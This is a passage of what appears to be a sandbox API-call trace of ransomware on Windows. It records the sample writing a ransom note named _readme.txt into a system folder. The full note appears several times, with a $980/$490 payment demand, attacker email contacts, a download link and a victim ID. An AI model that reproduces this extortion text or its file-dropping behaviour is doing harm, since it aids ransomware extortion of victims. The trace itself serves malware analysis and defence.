(HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.956] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0090.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.956] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.956] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.956] PathFindFileNameW (pszPath="") returned="" [0090.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.956] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.957] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.957] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.957] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.957] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0090.957] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.957] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.957] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.957] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.957] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99c9c68 [0090.957] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0090.957] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.957] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0090.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.961] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.961] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.961] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.961] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.962] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.962] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.962] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.963] CloseHandle (hObject=0x5cc) returned 1 [0090.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.963] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.963] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa347d1e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa347d1e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.964] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa347d1e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa347d1e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.964] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.964] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa347d1e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa347d1e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa347d1e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.964] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa347d1e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa347d1e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa347d1e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.964] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.964] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, 